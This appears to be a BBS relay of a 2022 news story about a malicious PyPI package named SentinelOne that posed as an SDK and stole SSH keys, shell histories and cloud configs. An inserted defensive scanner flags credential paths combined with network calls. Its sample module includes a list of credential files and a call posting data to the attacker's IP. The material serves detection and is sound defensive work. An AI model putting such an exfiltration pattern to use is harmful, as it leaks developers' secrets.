• There's another malicious PyPl package - this one stealing data f

    From TechnologyDaily@1337:1/100 to All on Tue Dec 20 21:15:04 2022
    There's another malicious PyPl package - this one stealing data from developers

    Date:
    Tue, 20 Dec 2022 21:08:32 +0000

    Description:
    Threat actors tried abusing a legitimate cybersecurity firm to distribute an infostealing package.

    FULL STORY ======================================================================

    Criminals have been caught impersonating a well-known cybersecurity firm in an attempt to steal data from software developers, researchers have found.

    Researchers from ReversingLabs recently discovered a malicious Python package on PyPI called SentinelOne. Named after a known cybersecurity company from the United States, the package pretends to be a legitimate SDK client allowing easy access to the SentinelOne API from within a separate project.

    However, the package also carries api.py files that hold the malicious code and allow the threat actors to exfiltrate sensitive data from developers to a third-party IP address (54.254.189.27).

    Going after auth tokens and API keys

    The data being stolen includes Bash and Zsh histories, SSH keys, .gitconfig files, hosts files, AWS configuration info, Kube configuration info, and others. As per the publication, these folders usually store auth tokens, secrets, and API keys, which would enable threat actors further access to target cloud services and server endpoints.
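    A defender-side check for the pattern described above, added here as an example rather than code from ReversingLabs or the article: it parses a package's Python modules and flags only files that reference the credential locations the story lists and also contain a way to send data off-host (a hard-coded IP literal or a network call). The two sample modules are constructed stand-ins, and NETWORK_CALLS is a hypothetical shortlist to tune for your own code base.

```python
import ast
import re

# Credential locations the article reports the package harvested (list compiled from the story).
SENSITIVE_PATHS = (".bash_history", ".zsh_history", ".ssh", ".gitconfig", "/etc/hosts", ".aws", ".kube")
IP_LITERAL = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# Hypothetical shortlist of call names that usually move data off-host; tune for your code base.
NETWORK_CALLS = {"urlopen", "post", "put", "connect", "sendall"}

def scan_source(src):
    """Collect three indicator classes from one Python source string using only its AST."""
    found = {"sensitive_paths": set(), "ip_literals": set(), "network_calls": set()}
    for node in ast.walk(ast.parse(src)):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            found["sensitive_paths"].update(p for p in SENSITIVE_PATHS if p in node.value)
            found["ip_literals"].update(IP_LITERAL.findall(node.value))
        elif isinstance(node, ast.Call):
            f = node.func
            name = f.attr if isinstance(f, ast.Attribute) else getattr(f, "id", None)
            if name in NETWORK_CALLS:
                found["network_calls"].add(name)
    return found

def is_suspicious(found):
    """Flag only the combination: touches credential locations AND can ship data out."""
    return bool(found["sensitive_paths"]) and bool(found["ip_literals"] or found["network_calls"])

def triage(modules):
    """modules: {filename: source}. Returns the subset worth a human look, with their indicators."""
    report = {}
    for name, src in modules.items():
        found = scan_source(src)
        if is_suspicious(found):
            report[name] = found
    return report

# Constructed stand-ins for the two kinds of file the article describes; neither is real package code.
SAMPLE_SDK = '''
import requests
def list_agents(base_url, token):
    return requests.get(base_url + "/api/agents", headers={"Authorization": token})
'''
SAMPLE_API = '''
import urllib.request
TARGETS = ["~/.bash_history", "~/.ssh", "~/.gitconfig", "~/.aws/credentials", "~/.kube/config"]
def _send(blob):
    urllib.request.urlopen("http://54.254.189.27/", data=blob)
'''
```

    Run triage over the unpacked wheel or sdist of a dependency before installing it; a legitimate SDK client such as SAMPLE_SDK makes network calls but never touches these paths, which is why only the combination is flagged.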

    The worst part is that the package does offer the functionality the developers expect. In reality, this is a hijacked package, meaning unsuspecting developers might end up using it and becoming victims in ignorance. The good news is that ReversingLabs confirmed the malicious intent of the package and, after reporting it to both SentinelOne and PyPI, had it removed from the repository.

    In the days and weeks leading up to the removal, the malicious actors were quite active. The package was first uploaded to PyPI on December 11, and has been updated 20 times in less than 10 days.

    One of the issues that were fixed with an update was the inability to exfiltrate data from Linux systems, the researchers found.

    It's difficult to say if anyone fell for the scam, the researchers concluded, as there is no evidence the package got used in an actual attack. Still, all the published versions were downloaded more than 1,000 times.

    Via: BleepingComputer



    ======================================================================
    Link to news story: https://www.techradar.com/news/theres-another-malicious-pypl-package-this-one-stealing-data-from-developers


    --- Mystic BBS v1.12 A47 (Linux/64)
    * Origin: tqwNet Technology News (1337:1/100)